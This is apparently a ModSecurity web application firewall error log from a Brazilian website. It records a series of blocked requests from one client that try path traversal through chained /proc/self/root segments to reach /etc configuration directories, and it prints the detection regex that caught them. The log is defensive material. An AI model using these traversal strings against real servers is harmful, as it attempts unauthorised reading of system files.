[Tue Mar 17 08:32:04.041428 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.241.46:47110] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7tAeiSKl8TjouI-b67gAAA8Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:05.411863 2026] [:error] [pid 2325:tid 140411540502272] [client 74.7.241.46:47112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7te82sZHvlq4xgHq8DQAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:05.669028 2026] [:error] [pid 2325:tid 140411658000128] [client 74.7.241.46:47112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7te82sZHvlq4xgHq8DwAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:06.996190 2026] [:error] [pid 11293:tid 140411649607424] [client 74.7.241.46:47124] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7ttCmCSWTlPouqorD8wAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:08.177060 2026] [:error] [pid 11293:tid 140411725141760] [client 74.7.241.46:59408] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7uNCmCSWTlPouqorD9AAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:09.510950 2026] [:error] [pid 11293:tid 140411674785536] [client 74.7.241.46:59422] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7udCmCSWTlPouqorD9gAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:10.734299 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.241.46:59430] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7uqBJNF7axNlVR0X1cAAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:12.052298 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.241.46:59436] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7vAeiSKl8TjouI-b68AAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:13.387050 2026] [:error] [pid 1016:tid 140411616036608] [client 74.7.241.46:59442] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7vZqmL8PQht4WJFlBIgAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:15.853444 2026] [:error] [pid 1016:tid 140411540502272] [client 74.7.241.46:59446] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7vpqmL8PQht4WJFlBJAAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:17.148818 2026] [:error] [pid 7000:tid 140411548894976] [client 74.7.241.46:59462] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7wRePVOt35XCGZP8n4gAAA5c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:18.310167 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.241.46:51896] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7wqBJNF7axNlVR0X1cQAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:18.595054 2026] [:error] [pid 2473:tid 140411607643904] [client 74.7.241.46:51896] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7wqBJNF7axNlVR0X1cgAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:19.915769 2026] [:error] [pid 7000:tid 140411574073088] [client 74.7.241.46:51910] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7wxePVOt35XCGZP8n4wAAA5Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:21.086866 2026] [:error] [pid 7000:tid 140411582465792] [client 74.7.241.46:51912] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7xRePVOt35XCGZP8n5AAAA5M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:22.601036 2026] [:error] [pid 11293:tid 140411708356352] [client 74.7.241.46:51914] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7xtCmCSWTlPouqorD-AAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:23.905344 2026] [:error] [pid 11469:tid 140411716749056] [client 74.7.241.46:51920] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7x5DEJR9VXonE_-1GqgAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:25.157315 2026] [:error] [pid 1210:tid 140411666392832] [client 74.7.241.46:51928] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7yVKJy4A1bGlmj9BOMQAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:26.356343 2026] [:error] [pid 2325:tid 140411641214720] [client 74.7.241.46:51932] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7yu82sZHvlq4xgHq8IgAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:27.532869 2026] [:error] [pid 1961:tid 140411725141760] [client 74.7.241.46:51944] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7y3RXaaWotPICgYsdtQAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:28.836289 2026] [:error] [pid 1210:tid 140411649607424] [client 74.7.241.46:40836] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7zFKJy4A1bGlmj9BOMgAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:30.014914 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.241.46:40844] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag 